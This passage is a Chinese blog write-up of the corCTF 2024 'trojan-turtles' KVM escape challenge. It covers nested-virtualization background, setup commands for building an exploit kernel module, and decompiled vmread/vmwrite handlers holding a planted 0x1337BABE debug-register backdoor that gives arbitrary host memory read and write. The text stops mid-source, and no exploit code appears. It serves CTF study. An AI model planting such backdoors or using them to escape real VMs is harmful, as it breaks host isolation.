KVM逃逸-嵌套虚拟化-corCTF 2024-trojan-turtles 复现

最新推荐文章于 2024-09-24 23:51:48 发布

看星猩的柴狗

最新推荐文章于 2024-09-24 23:51:48 发布

阅读量904

点赞数 15

分类专栏： CTF-PWN-虚拟化文章标签： PWN

本文链接：https://blog.csdn.net/llovewuzhengzi/article/details/140787240

版权

CTF-PWN-虚拟化专栏收录该内容

12 篇文章

订阅专栏

参考

https://zolutal.github.io/corctf-trojan-turtles/
https://eqqie.cn/index.php/archives/1972

本文首发于奇安信攻防社区https://forum.butian.net/question/1370

KVM（Kernel-based Virtual Machine）

这段描述解释了 KVM (Kernel-based Virtual Machine) 的概念、实现方式以及如何与 QEMU (Quick Emulator) 结合使用。下面是具体的解释和例子：

KVM 的概念

KVM 是一种基于 Linux 内核的虚拟化技术，它允许 Linux 内核充当虚拟机监控器 (VMM) 或 hypervisor。KVM 的主要目的是提供一个统一的接口，使用户空间程序能够利用硬件虚拟化特性（如 Intel 的 VMX 和 AMD 的 SVM）来创建和管理虚拟机。

KVM 的实现

KVM 通过一个名为 /dev/kvm 的字符设备驱动程序实现。该驱动程序提供了一系列 ioctl (输入输出控制) 命令，用于管理和控制虚拟机 (VM) 的状态和行为。

ioctl 命令

ioctl 命令是一种通用的机制，用于在用户空间程序和内核空间之间传递控制信息。KVM 设备驱动程序提供了许多 ioctl 命令，这些命令用于配置虚拟机的状态、设置寄存器值、加载虚拟机的内存映射、控制虚拟机的执行等。

KVM_SET_REGS:
- 该命令用于设置虚拟机的寄存器状态。
- 用户空间程序可以使用此命令来将通用寄存器写入 vcpu的通用寄存器中。

KVM API 文档

API 文档:
- 更多关于 KVM API 的详细信息可以在 Linux 内核文档中找到，具体链接为：https://docs.kernel.org/virt/kvm/api.html
- 这些文档详细介绍了可用的 ioctl 命令、参数结构和如何使用它们来控制虚拟机。

KVM 的编译选项

KVM 可以以不同的形式集成到 Linux 内核中，具体取决于编译时的选择：

编译到内核中:
- 如果在内核配置中将 CONFIG_KVM_INTEL 设置为 y，则 KVM 将被编译到内核映像中。
- 这意味着 KVM 成为内核的一部分，无需加载额外的模块即可使用。
编译为内核模块:
- 如果 CONFIG_KVM_INTEL 设置为 m，那么 KVM 将被编译为一个可加载的内核模块。
- 这意味着 KVM 功能可以通过动态加载模块的方式启用或禁用，提供了更大的灵活性。

QEMU 与 KVM 的结合

QEMU 是一个通用的全系统仿真器，它可以模拟多种硬件架构。当与 KVM 结合使用时，QEMU 可以利用 KVM 提供的硬件加速功能来提高虚拟机的性能。

使用 KVM:
- 当您使用 --enable-kvm 参数启动 QEMU 时，QEMU 将使用 KVM API 来运行虚拟机。
- 这意味着 QEMU 将利用硬件虚拟化特性，而不是完全通过软件进行模拟。
- 结果是提高了虚拟机的性能，减少了 CPU 开销。
不使用 KVM:
- 如果没有使用 --enable-kvm 参数，QEMU 将通过纯软件模拟的方式来运行虚拟机。
- 这种模式下的性能通常较低，因为它需要 QEMU 在用户空间中模拟所有的硬件细节。

工作原理

初始化：当 KVM 被启动时，它会检查硬件是否支持虚拟化，并初始化必要的数据结构。
创建虚拟机：用户空间的应用程序通过系统调用告知内核创建一个新的虚拟机实例。
配置虚拟机：应用程序通过一系列系统调用来配置虚拟机的硬件（如内存大小、CPU 数量等）和加载操作系统镜像。
运行虚拟机：一旦配置完成，应用程序可以启动虚拟机。此时，KVM 会接管虚拟机的操作并确保它们正确地执行。
特权指令处理：当虚拟机尝试执行特权指令时，这些指令会被捕获并传递给 KVM，由 KVM 在宿主机上模拟执行或直接在硬件上执行（如果支持的话）。

嵌套虚拟化（虚拟机里再建一个虚拟机）

当我们说"处理器现在可以执行VMX(虚拟化)相关的指令了"，这意味着CPU获得了执行一系列特殊指令的能力，这些指令专门用于虚拟化操作。

VMX指令集：
- Intel处理器有一组特殊的指令，专门用于虚拟化，称为VMX（Virtual Machine Extensions）指令。
- 这些指令包括VMXON, VMXOFF, VMLAUNCH, VMRESUME, VMREAD, VMWRITE等。
指令的作用：
- 这些指令允许操作系统或虚拟机管理器（如VMware, VirtualBox）创建和管理虚拟机。
- 它们提供了硬件级别的支持，使虚拟化更高效、更安全。
启用前后的区别：
- 启用VMXE位之前：如果尝试执行这些VMX指令，处理器会产生一个异常（通常是非法指令异常）。
- 启用VMXE位之后：处理器能够正确识别和执行这些指令。
实际应用例子：
假设你要在电脑上运行一个虚拟机：
- 启用VMXE之前：虚拟机软件只能通过纯软件模拟来运行虚拟机，效率较低。
- 启用VMXE之后：虚拟机软件可以利用这些硬件指令，大大提高虚拟机的运行效率。

嵌套虚拟化的系统中虚拟机执行vmx指令（对虚拟机中的虚拟机的相关操作）

vmx指令相关使用

初始状态：
- L0: 主机VMM (Hypervisor)
- L1: 第一层虚拟机，运行自己的VMM
- L2: 第二层虚拟机（可选）
L1执行VMX指令：

a. 指令拦截：
- L1尝试执行VMX指令
- 硬件检测到这是一个需要特殊处理的指令
b. VM Exit到L0：
- 控制权从L1转移到L0 VMM
- L0 VMM获得关于VM Exit原因的信息
c. L0 VMM分析：
- 确定是VMX指令导致的退出
- 检查L1的权限和当前状态
d. 模拟执行：
- L0 VMM不会直接执行该指令
- 相反，它模拟指令的效果
e. 虚拟VMCS操作：
- 如果指令涉及VMCS操作，L0会操作分配给L1的虚拟VMCS
- 虚拟VMCS是实际VMCS的一个"影子"或模拟
f. 状态更新：
- L0更新L1的虚拟状态，使其看起来好像指令已经执行
g. VM Entry回到L1：
- L0完成模拟后，将控制权返回给L1
- L1继续执行，就像它直接执行了VMX指令一样
特殊情况 - L1创建L2：

a. L1执行VMLAUNCH/VMRESUME：
- 用于启动或恢复L2虚拟机
b. L0拦截并模拟：
- L0创建或配置用于L2的新虚拟VMCS
- 设置必要的嵌套虚拟化结构
c. 实际VM Entry：
- L0执行真正的VM Entry进入L2
- L2开始执行，认为它是由L1直接管理的
L2执行需要VM Exit的操作：

a. 硬件VM Exit到L0：
- 控制权直接转到L0，不经过L1
b. L0决策：
- 决定是否需要通知L1
- 如果需要，模拟一个从L2到L1的VM Exit
- 否则，L0自己处理并返回到L2
优化和硬件支持：
- 现代处理器提供如VMCS Shadowing等功能
- 这些功能可以减少VM Exit的次数，提高性能
循环继续：
- 这个过程不断重复，处理L1和L2的各种操作

镜像文件qcow2/上传exp/调试

安装了 QEMU 的工具

# 对于 Debian/Ubuntu:
sudo apt-get install qemu-utils

接下来，检查 .qcow2 文件的信息：

qemu-img info chall.qcow2

挂载查看文件并修改

sudo guestmount -a chall.qcow2 -m /dev/sda /mnt/qcow2
cd /mnt/qcow2

在这里插入图片描述

tree -L 2

发现有这个玩意，应该就是虚拟机对应的镜像了和文件系统和启动脚本了，将其虚拟机的文件系统解压查看然后添加exp模块进去再打包再起虚拟机就行了
在这里插入图片描述
分别安装相关内核库,这里是要生成对应的虚拟机中的内核模块，然后加载模块进而逃逸到主机

sudo dpkg -i linux-hwe-5.15-headers-5.15.0-107_5.15.0-107.117~20.04.1_all.deb
sudo dpkg -i linux-headers-5.15.0-107-generic_5.15.0-107.117~20.04.1_amd64.deb
ls /usr/lib/modules/5.15.0-107-generic/build

exp.c下的Makefile，/usr/lib/modules/5.15.0-107-generic/build目录下一般也有，没就建一个就好了


obj-m += exp.o
KDIR := /usr/lib/modules/5.15.0-107-generic/build
PWD := $(shell pwd)

all:
	make -C $(KDIR) M=$(PWD) modules

clean:
	make -C $(KDIR) M=$(PWD) clean

然后make就可以生成了

漏洞

虚拟机进行相关vmx指令或者说嵌套虚拟化时由于相关vmx指令会被检测到是特殊指令会触发VMexit，然后宿主机VMM来处理该特殊指令

diff

diff点在于handle_vmread和handle_vmwrite函数
在这里插入图片描述

在这里插入图片描述

__int64 __fastcall handle_vmwrite(__int64 a1, int a2, int a3, int a4, int a5, int a6){
{
………
………
 if ( kvm_get_dr(a1, 0LL) == 0x1337BABE )
  {
    dr = kvm_get_dr(a1, 1LL);
    *(_QWORD *)(v7 + 8 * dr) = kvm_get_dr(a1, 2LL);
  }
………
}
__int64 __fastcall handle_vmread(__int64 a1, int a2, int a3, int a4, int a5, int a6)
{
	…………
  if ( kvm_get_dr(a1, 0LL) == 0x1337BABE )
  {
    dr = kvm_get_dr(a1, 1LL);
    kvm_set_dr(a1, 2LL, *(_QWORD *)(v6 + 8 * dr));
  }
  …………………
}

static inline struct vmcs12 *get_shadow_vmcs12(struct kvm_vcpu *vcpu)
{
	return to_vmx(vcpu)->nested.cached_shadow_vmcs12;
}

static __always_inline struct vcpu_vmx *to_vmx(struct kvm_vcpu *vcpu)
{
	return container_of(vcpu, struct vcpu_vmx, vcpu);
}

#define container_of(ptr, type, member) ({				\
	void *__mptr = (void *)(ptr);					\
	static_assert(__same_type(*(ptr), ((type *)0)->member) ||	\
		      __same_type(*(ptr), void),			\
		      "pointer type mismatch in container_of()");	\
	((type *)(__mptr - offsetof(type, member))); })

在这里插入图片描述
上面的代码是用于检查是否有嵌套虚拟化的

Guest Mode（客户模式）:
在嵌套虚拟化中，“guest mode” 指的是虚拟机（VM）内部又运行了一个虚拟机监控器（VMM）的情况。换句话说，它是一个虚拟机中的虚拟机。
嵌套虚拟化的层次：
- L0: 最底层的硬件和主要的虚拟机监控器
- L1: 运行在L0上的虚拟机，同时也是一个VMM
- L2: 运行在L1虚拟机内部的虚拟机
is_guest_mode(vcpu):
这个函数检查给定的虚拟CPU (vcpu) 是否处于guest mode。如果是，说明当前正在运行L2虚拟机。
VMCS (Virtual Machine Control Structure):
VMCS是Intel虚拟化技术中用于控制虚拟机行为的数据结构。
vmcs12:
在嵌套虚拟化中，vmcs12表示L1 VMM用于管理L2虚拟机的VMCS。
代码解释:
- 如果处于guest mode（即运行L2虚拟机），使用get_shadow_vmcs12(vcpu)获取shadow VMCS。
- 如果不是guest mode，则使用get_vmcs12(vcpu)获取常规的VMCS12。

相关源码和结构体


struct nested_vmx {
	/* Has the level1 guest done vmxon? */
	bool vmxon;
	gpa_t vmxon_ptr;
	bool pml_full;

	/* The guest-physical address of the current VMCS L1 keeps for L2 */
	gpa_t current_vmptr;
	/*
	 * Cache of the guest's VMCS, existing outside of guest memory.
	 * Loaded from guest memory during VMPTRLD. Flushed to guest
	 * memory during VMCLEAR and VMPTRLD.
	 */
	struct vmcs12 *cached_vmcs12;
	/*
	 * Cache of the guest's shadow VMCS, existing outside of guest
	 * memory. Loaded from guest memory during VM entry. Flushed
	 * to guest memory during VM exit.
	 */
	struct vmcs12 *cached_shadow_vmcs12;

	/*
	 * GPA to HVA cache for accessing vmcs12->vmcs_link_pointer
	 */
	struct gfn_to_hva_cache shadow_vmcs12_cache;

	/*
	 * GPA to HVA cache for VMCS12
	 */
	struct gfn_to_hva_cache vmcs12_cache;

	/*
	 * Indicates if the shadow vmcs or enlightened vmcs must be updated
	 * with the data held by struct vmcs12.
	 */
	bool need_vmcs12_to_shadow_sync;
	bool dirty_vmcs12;

	/*
	 * Indicates whether MSR bitmap for L2 needs to be rebuilt due to
	 * changes in MSR bitmap for L1 or switching to a different L2. Note,
	 * this flag can only be used reliably in conjunction with a paravirt L1
	 * which informs L0 whether any changes to MSR bitmap for L2 were done
	 * on its side.
	 */
	bool force_msr_bitmap_recalc;

	/*
	 * Indicates lazily loaded guest state has not yet been decached from
	 * vmcs02.
	 */
	bool need_sync_vmcs02_to_vmcs12_rare;

	/*
	 * vmcs02 has been initialized, i.e. state that is constant for
	 * vmcs02 has been written to the backing VMCS.  Initialization
	 * is delayed until L1 actually attempts to run a nested VM.
	 */
	bool vmcs02_initialized;

	bool change_vmcs01_virtual_apic_mode;
	bool reload_vmcs01_apic_access_page;
	bool update_vmcs01_cpu_dirty_logging;
	bool update_vmcs01_apicv_status;

	/*
	 * Enlightened VMCS has been enabled. It does not mean that L1 has to
	 * use it. However, VMX features available to L1 will be limited based
	 * on what the enlightened VMCS supports.
	 */
	bool enlightened_vmcs_enabled;

	/* L2 must run next, and mustn't decide to exit to L1. */
	bool nested_run_pending;

	/* Pending MTF VM-exit into L1.  */
	bool mtf_pending;

	struct loaded_vmcs vmcs02;

	/*
	 * Guest pages referred to in the vmcs02 with host-physical
	 * pointers, so we must keep them pinned while L2 runs.
	 */
	struct kvm_host_map apic_access_page_map;
	struct kvm_host_map virtual_apic_map;
	struct kvm_host_map pi_desc_map;

	struct kvm_host_map msr_bitmap_map;

	struct pi_desc *pi_desc;
	bool pi_pending;
	u16 posted_intr_nv;

	struct hrtimer preemption_timer;
	u64 preemption_timer_deadline;
	bool has_preemption_timer_deadline;
	bool preemption_timer_expired;

	/*
	 * Used to snapshot MSRs that are conditionally loaded on VM-Enter in
	 * order to propagate the guest's pre-VM-Enter value into vmcs02.  For
	 * emulation of VMLAUNCH/VMRESUME, the snapshot will be of L1's value.
	 * For KVM_SET_NESTED_STATE, the snapshot is of L2's value, _if_
	 * userspace restores MSRs before nested state.  If userspace restores
	 * MSRs after nested state, the snapshot holds garbage, but KVM can't
	 * detect that, and the garbage value in vmcs02 will be overwritten by
	 * MSR restoration in any case.
	 */
	u64 pre_vmenter_debugctl;
	u64 pre_vmenter_bndcfgs;

	/* to migrate it to L1 if L2 writes to L1's CR8 directly */
	int l1_tpr_threshold;

	u16 vpid02;
	u16 last_vpid;

	struct nested_vmx_msrs msrs;

	/* SMM related state */
	struct {
		/* in VMX operation on SMM entry? */
		bool vmxon;
		/* in guest mode on SMM entry? */
		bool guest_mode;
	} smm;

#ifdef CONFIG_KVM_HYPERV
	gpa_t hv_evmcs_vmptr;
	struct kvm_host_map hv_evmcs_map;
	struct hv_enlightened_vmcs *hv_evmcs;
#endif
};

struct kvm_vcpu {
	struct kvm *kvm;
#ifdef CONFIG_PREEMPT_NOTIFIERS
	struct preempt_notifier preempt_notifier;
#endif
	int cpu;
	int vcpu_id; /* id given by userspace at creation */
	int vcpu_idx; /* index into kvm->vcpu_array */
	int ____srcu_idx; /* Don't use this directly.  You've been warned. */
#ifdef CONFIG_PROVE_RCU
	int srcu_depth;
#endif
	int mode;
	u64 requests;
	unsigned long guest_debug;

	struct mutex mutex;
	struct kvm_run *run;

#ifndef __KVM_HAVE_ARCH_WQP
	struct rcuwait wait;
#endif
	struct pid __rcu *pid;
	int sigset_active;
	sigset_t sigset;
	unsigned int halt_poll_ns;
	bool valid_wakeup;

#ifdef CONFIG_HAS_IOMEM
	int mmio_needed;
	int mmio_read_completed;
	int mmio_is_write;
	int mmio_cur_fragment;
	int mmio_nr_fragments;
	struct kvm_mmio_fragment mmio_fragments[KVM_MAX_MMIO_FRAGMENTS];
#endif

#ifdef CONFIG_KVM_ASYNC_PF
	struct {
		u32 queued;
		struct list_head queue;
		struct list_head done;
		spinlock_t lock;
	} async_pf;
#endif

#ifdef CONFIG_HAVE_KVM_CPU_RELAX_INTERCEPT
	/*
	 * Cpu relax intercept or pause loop exit optimization
	 * in_spin_loop: set when a vcpu does a pause loop exit
	 *  or cpu relax intercepted.
	 * dy_eligible: indicates whether vcpu is eligible for directed yield.
	 */
	struct {
		bool in_spin_loop;
		bool dy_eligible;
	} spin_loop;
#endif
	bool preempted;
	bool ready;
	struct kvm_vcpu_arch arch;
	struct kvm_vcpu_stat stat;
	char stats_id[KVM_STATS_NAME_SIZE];
	struct kvm_dirty_ring dirty_ring;

	/*
	 * The most recently used memslot by this vCPU and the slots generation
	 * for which it is valid.
	 * No wraparound protection is needed since generations won't overflow in
	 * thousands of years, even assuming 1M memslot operations per second.
	 */
	struct kvm_memory_slot *last_used_slot;
	u64 last_used_slot_gen;
};


struct kvm_vcpu_arch {
	/*
	 * rip and regs accesses must go through
	 * kvm_{register,rip}_{read,write} functions.
	 */
	unsigned long regs[NR_VCPU_REGS];
	u32 regs_avail;
	u32 regs_dirty;

	unsigned long cr0;
	unsigned long cr0_guest_owned_bits;
	unsigned long cr2;
	unsigned long cr3;
	unsigned long cr4;
	unsigned long cr4_guest_owned_bits;
	unsigned long cr4_guest_rsvd_bits;
	unsigned long cr8;
	u32 host_pkru;
	u32 pkru;
	u32 hflags;
	u64 efer;
	u64 apic_base;
	struct kvm_lapic *apic;    /* kernel irqchip context */
	bool load_eoi_exitmap_pending;
	DECLARE_BITMAP(ioapic_handled_vectors, 256);
	unsigned long apic_attention;
	int32_t apic_arb_prio;
	int mp_state;
	u64 ia32_misc_enable_msr;
	u64 smbase;
	u64 smi_count;
	bool at_instruction_boundary;
	bool tpr_access_reporting;
	bool xfd_no_write_intercept;
	u64 ia32_xss;
	u64 microcode_version;
	u64 arch_capabilities;
	u64 perf_capabilities;

	/*
	 * Paging state of the vcpu
	 *
	 * If the vcpu runs in guest mode with two level paging this still saves
	 * the paging mode of the l1 guest. This context is always used to
	 * handle faults.
	 */
	struct kvm_mmu *mmu;

	/* Non-nested MMU for L1 */
	struct kvm_mmu root_mmu;

	/* L1 MMU when running nested */
	struct kvm_mmu guest_mmu;

	/*
	 * Paging state of an L2 guest (used for nested npt)
	 *
	 * This context will save all necessary information to walk page tables
	 * of an L2 guest. This context is only initialized for page table
	 * walking and not for faulting since we never handle l2 page faults on
	 * the host.
	 */
	struct kvm_mmu nested_mmu;

	/*
	 * Pointer to the mmu context currently used for
	 * gva_to_gpa translations.
	 */
	struct kvm_mmu *walk_mmu;

	struct kvm_mmu_memory_cache mmu_pte_list_desc_cache;
	struct kvm_mmu_memory_cache mmu_shadow_page_cache;
	struct kvm_mmu_memory_cache mmu_shadowed_info_cache;
	struct kvm_mmu_memory_cache mmu_page_header_cache;

	/*
	 * QEMU userspace and the guest each have their own FPU state.
	 * In vcpu_run, we switch between the user and guest FPU contexts.
	 * While running a VCPU, the VCPU thread will have the guest FPU
	 * context.
	 *
	 * Note that while the PKRU state lives inside the fpu registers,
	 * it is switched out separately at VMENTER and VMEXIT time. The
	 * "guest_fpstate" state here contains the guest FPU context, with the
	 * host PRKU bits.
	 */
	struct fpu_guest guest_fpu;

	u64 xcr0;
	u64 guest_supported_xcr0;

	struct kvm_pio_request pio;
	void *pio_data;
	void *sev_pio_data;
	unsigned sev_pio_count;

	u8 event_exit_inst_len;

	bool exception_from_userspace;

	/* Exceptions to be injected to the guest. */
	struct kvm_queued_exception exception;
	/* Exception VM-Exits to be synthesized to L1. */
	struct kvm_queued_exception exception_vmexit;

	struct kvm_queued_interrupt {
		bool injected;
		bool soft;
		u8 nr;
	} interrupt;

	int halt_request; /* real mode on Intel only */

	int cpuid_nent;
	struct kvm_cpuid_entry2 *cpuid_entries;
	struct kvm_hypervisor_cpuid kvm_cpuid;
	bool is_amd_compatible;

	/*
	 * FIXME: Drop this macro and use KVM_NR_GOVERNED_FEATURES directly
	 * when "struct kvm_vcpu_arch" is no longer defined in an
	 * arch/x86/include/asm header.  The max is mostly arbitrary, i.e.
	 * can be increased as necessary.
	 */
#define KVM_MAX_NR_GOVERNED_FEATURES BITS_PER_LONG

	/*
	 * Track whether or not the guest is allowed to use features that are
	 * governed by KVM, where "governed" means KVM needs to manage state
	 * and/or explicitly enable the feature in hardware.  Typically, but
	 * not always, governed features can be used by the guest if and only
	 * if both KVM and userspace want to expose the feature to the guest.
	 */
	struct {
		DECLARE_BITMAP(enabled, KVM_MAX_NR_GOVERNED_FEATURES);
	} governed_features;

	u64 reserved_gpa_bits;
	int maxphyaddr;

	/* emulate context */

	struct x86_emulate_ctxt *emulate_ctxt;
	bool emulate_regs_need_sync_to_vcpu;
	bool emulate_regs_need_sync_from_vcpu;
	int (*complete_userspace_io)(struct kvm_vcpu *vcpu);

	gpa_t time;
	struct pvclock_vcpu_time_info hv_clock;
	unsigned int hw_tsc_khz;
	struct gfn_to_pfn_cache pv_time;
	/* set guest stopped flag in pvclock flags field */
	bool pvclock_set_guest_stopped_request;

	struct {
		u8 preempted;
		u64 msr_val;
		u64 last_steal;
		struct gfn_to_hva_cache cache;
	} st;

	u64 l1_tsc_offset;
	u64 tsc_offset; /* current tsc offset */
	u64 last_guest_tsc;
	u64 last_host_tsc;
	u64 tsc_offset_adjustment;
	u64 this_tsc_nsec;
	u64 this_tsc_write;
	u64 this_tsc_generation;
	bool tsc_catchup;
	bool tsc_always_catchup;
	s8 virtual_tsc_shift;
	u32 virtual_tsc_mult;
	u32 virtual_tsc_khz;
	s64 ia32_tsc_adjust_msr;
	u64 msr_ia32_power_ctl;
	u64 l1_tsc_scaling_ratio;
	u64 tsc_scaling_ratio; /* current scaling ratio */

	atomic_t nmi_queued;  /* unprocessed asynchronous NMIs */
	/* Number of NMIs pending injection, not including hardware vNMIs. */
	unsigned int nmi_pending;
	bool nmi_injected;    /* Trying to inject an NMI this entry */
	bool smi_pending;    /* SMI queued after currently running handler */
	u8 handling_intr_from_guest;

	struct kvm_mtrr mtrr_state;
	u64 pat;

	unsigned switch_db_regs;
	unsigned long db[KVM_NR_DB_REGS];    //  #define KVM_NR_DB_REGS	4
	unsigned long dr6;
	unsigned long dr7;
	unsigned long eff_db[KVM_NR_DB_REGS];
	unsigned long guest_debug_dr7;
	u64 msr_platform_info;
	u64 msr_misc_features_enables;

	u64 mcg_cap;
	u64 mcg_status;
	u64 mcg_ctl;
	u64 mcg_ext_ctl;
	u64 *mce_banks;
	u64 *mci_ctl2_banks;

	/* Cache MMIO info */
	u64 mmio_gva;
	unsigned mmio_access;
	gfn_t mmio_gfn;
	u64 mmio_gen;

	struct kvm_pmu pmu;

	/* used for guest single stepping over the given code position */
	unsigned long singlestep_rip;

#ifdef CONFIG_KVM_HYPERV
	bool hyperv_enabled;
	struct kvm_vcpu_hv *hyperv;
#endif
#ifdef CONFIG_KVM_XEN
	struct kvm_vcpu_xen xen;
#endif
	cpumask_var_t wbinvd_dirty_mask;

	unsigned long last_retry_eip;
	unsigned long last_retry_addr;

	struct {
		bool halted;
		gfn_t gfns[ASYNC_PF_PER_VCPU];
		struct gfn_to_hva_cache data;
		u64 msr_en_val; /* MSR_KVM_ASYNC_PF_EN */
		u64 msr_int_val; /* MSR_KVM_ASYNC_PF_INT */
		u16 vec;
		u32 id;
		bool send_user_only;
		u32 host_apf_flags;
		bool delivery_as_pf_vmexit;
		bool pageready_pending;
	} apf;

	/* OSVW MSRs (AMD only) */
	struct {
		u64 length;
		u64 status;
	} osvw;

	struct {
		u64 msr_val;
		struct gfn_to_hva_cache data;
	} pv_eoi;

	u64 msr_kvm_poll_control;

	/* set at EPT violation at this point */
	unsigned long exit_qualification;

	/* pv related host specific info */
	struct {
		bool pv_unhalted;
	} pv;

	int pending_ioapic_eoi;
	int pending_external_vector;

	/* be preempted when it's in kernel-mode(cpl=0) */
	bool preempted_in_kernel;

	/* Flush the L1 Data cache for L1TF mitigation on VMENTER */
	bool l1tf_flush_l1d;

	/* Host CPU on which VM-entry was most recently attempted */
	int last_vmentry_cpu;

	/* AMD MSRC001_0015 Hardware Configuration */
	u64 msr_hwcr;

	/* pv related cpuid info */
	struct {
		/*
		 * value of the eax register in the KVM_CPUID_FEATURES CPUID
		 * leaf.
		 */
		u32 features;

		/*
		 * indicates whether pv emulation should be disabled if features
		 * are not present in the guest's cpuid
		 */
		bool enforce;
	} pv_cpuid;

	/* Protected Guests */
	bool guest_state_protected;

	/*
	 * Set when PDPTS were loaded directly by the userspace without
	 * reading the guest memory
	 */
	bool pdptrs_from_userspace;

#if IS_ENABLED(CONFIG_HYPERV)
	hpa_t hv_root_tdp;
#endif
};


#define HF_GUEST_MASK		(1 << 0) /* VCPU is in guest-mode */

static inline bool is_guest_mode(struct kvm_vcpu *vcpu)
{
	return vcpu->arch.hflags & HF_GUEST_MASK;
}

struct __packed vmcs12 {
	/* According to the Intel spec, a VMCS region must start with the
	 * following two fields. Then follow implementation-specific data.
	 */
	struct vmcs_hdr hdr;
	u32 abort;

	u32 launch_state; /* set to 0 by VMCLEAR, to 1 by VMLAUNCH */
	u32 padding[7]; /* room for future expansion */

	u64 io_bitmap_a;
	u64 io_bitmap_b;
	u64 msr_bitmap;
	u64 vm_exit_msr_store_addr;
	u64 vm_exit_msr_load_addr;
	u64 vm_entry_msr_load_addr;
	u64 tsc_offset;
	u64 virtual_apic_page_addr;
	u64 apic_access_addr;
	u64 posted_intr_desc_addr;
	u64 ept_pointer;
	u64 eoi_exit_bitmap0;
	u64 eoi_exit_bitmap1;
	u64 eoi_exit_bitmap2;
	u64 eoi_exit_bitmap3;
	u64 xss_exit_bitmap;
	u64 guest_physical_address;
	u64 vmcs_link_pointer;
	u64 guest_ia32_debugctl;
	u64 guest_ia32_pat;
	u64 guest_ia32_efer;
	u64 guest_ia32_perf_global_ctrl;
	u64 guest_pdptr0;
	u64 guest_pdptr1;
	u64 guest_pdptr2;
	u64 guest_pdptr3;
	u64 guest_bndcfgs;
	u64 host_ia32_pat;
	u64 host_ia32_efer;
	u64 host_ia32_perf_global_ctrl;
	u64 vmread_bitmap;
	u64 vmwrite_bitmap;
	u64 vm_function_control;
	u64 eptp_list_address;
	u64 pml_address;
	u64 encls_exiting_bitmap;
	u64 tsc_multiplier;
	u64 padding64[1]; /* room for future expansion */
	/*
	 * To allow migration of L1 (complete with its L2 guests) between
	 * machines of different natural widths (32 or 64 bit), we cannot have
	 * unsigned long fields with no explicit size. We use u64 (aliased
	 * natural_width) instead. Luckily, x86 is little-endian.
	 */
	natural_width cr0_guest_host_mask;
	natural_width cr4_guest_host_mask;
	natural_width cr0_read_shadow;
	natural_width cr4_read_shadow;
	natural_width dead_space[4]; /* Last remnants of cr3_target_value[0-3]. */
	natural_width exit_qualification;
	natural_width guest_linear_address;
	natural_width guest_cr0;
	natural_width guest_cr3;
	natural_width guest_cr4;
	natural_width guest_es_base;
	natural_width guest_cs_base;
	natural_width guest_ss_base;
	natural_width guest_ds_base;
	natural_width guest_fs_base;
	natural_width guest_gs_base;
	natural_width guest_ldtr_base;
	natural_width guest_tr_base;
	natural_width guest_gdtr_base;
	natural_width guest_idtr_base;
	natural_width guest_dr7;
	natural_width guest_rsp;
	natural_width guest_rip;
	natural_width guest_rflags;
	natural_width guest_pending_dbg_exceptions;
	natural_width guest_sysenter_esp;
	natural_width guest_sysenter_eip;
	natural_width host_cr0;
	natural_width host_cr3;
	natural_width host_cr4;
	natural_width host_fs_base;
	natural_width host_gs_base;
	natural_width host_tr_base;
	natural_width host_gdtr_base;
	natural_width host_idtr_base;
	natural_width host_ia32_sysenter_esp;
	natural_width host_ia32_sysenter_eip;
	natural_width host_rsp;
	natural_width host_rip;
	natural_width paddingl[8]; /* room for future expansion */
	u32 pin_based_vm_exec_control;
	u32 cpu_based_vm_exec_control;
	u32 exception_bitmap;
	u32 page_fault_error_code_mask;
	u32 page_fault_error_code_match;
	u32 cr3_target_count;
	u32 vm_exit_controls;
	u32 vm_exit_msr_store_count;
	u32 vm_exit_msr_load_count;
	u32 vm_entry_controls;
	u32 vm_entry_msr_load_count;
	u32 vm_entry_intr_info_field;
	u32 vm_entry_exception_error_code;
	u32 vm_entry_instruction_len;
	u32 tpr_threshold;
	u32 secondary_vm_exec_control;
	u32 vm_instruction_error;
	u32 vm_exit_reason;
	u32 vm_exit_intr_info;
	u32 vm_exit_intr_error_code;
	u32 idt_vectoring_info_field;
	u32 idt_vectoring_error_code;
	u32 vm_exit_instruction_len;
	u32 vmx_instruction_info;
	u32 guest_es_limit;
	u32 guest_cs_limit;
	u32 guest_ss_limit;
	u32 guest_ds_limit;
	u32 guest_fs_limit;
	u32 guest_gs_limit;
	u32 guest_ldtr_limit;
	u32 guest_tr_limit;
	u32 guest_gdtr_limit;
	u32 guest_idtr_limit;
	u32 guest_es_ar_bytes;
	u32 guest_cs_ar_bytes;
	u32 guest_ss_ar_bytes;
	u32 guest_ds_ar_bytes;
	u32 guest_fs_ar_bytes;
	u32 guest_gs_ar_bytes;
	u32 guest_ldtr_ar_bytes;
	u32 guest_tr_ar_bytes;
	u32 guest_interruptibility_info;
	u32 guest_activity_state;
	u32 guest_sysenter_cs;
	u32 host_ia32_sysenter_cs;
	u32 vmx_preemption_timer_value;
	u32 padding32[7]; /* room for future expansion */
	u16 virtual_processor_id;
	u16 posted_intr_nv;
	u16 guest_es_selector;
	u16 guest_cs_selector;
	u16 guest_ss_selector;
	u16 guest_ds_selector;
	u16 guest_fs_selector;
	u16 guest_gs_selector;
	u16 guest_ldtr_selector;
	u16 guest_tr_selector;
	u16 guest_intr_status;
	u16 host_es_selector;
	u16 host_cs_selector;
	u16 host_ss_selector;
	u16 host_ds_selector;
	u16 host_fs_selector;
	u16 host_gs_selector;
	u16 host_tr_selector;
	u16 guest_pml_index;
};

static int handle_vmread(struct kvm_vcpu *vcpu)
{
	struct vmcs12 *vmcs12 = is_guest_mode(vcpu) ? get_shadow_vmcs12(vcpu)
						    : get_vmcs12(vcpu);
	unsigned long exit_qualification = vmx_get_exit_qual(vcpu);
	u32 instr_info = vmcs_read32(VMX_INSTRUCTION_INFO);
	struct vcpu_vmx *vmx = to_vmx(vcpu);
	struct x86_exception e;
	unsigned long field;
	u64 value;
	gva_t gva = 0;
	short offset;
	int len, r;

	if (!nested_vmx_check_permission(vcpu))
		return 1;

	/* Decode instruction info and find the field to read */
	field = kvm_register_read(vcpu, (((instr_info) >> 28) & 0xf));

	if (!nested_vmx_is_evmptr12_valid(vmx)) {
		/*
		 * In VMX non-root operation, when the VMCS-link pointer is INVALID_GPA,
		 * any VMREAD sets the ALU flags for VMfailInvalid.
		 */
		if (vmx->nested.current_vmptr == INVALID_GPA ||
		    (is_guest_mode(vcpu) &&
		     get_vmcs12(vcpu)->vmcs_link_pointer == INVALID_GPA))
			return nested_vmx_failInvalid(vcpu);

		offset = get_vmcs12_field_offset(field);
		if (offset < 0)
			return nested_vmx_fail(vcpu, VMXERR_UNSUPPORTED_VMCS_COMPONENT);

		if (!is_guest_mode(vcpu) && is_vmcs12_ext_field(field))
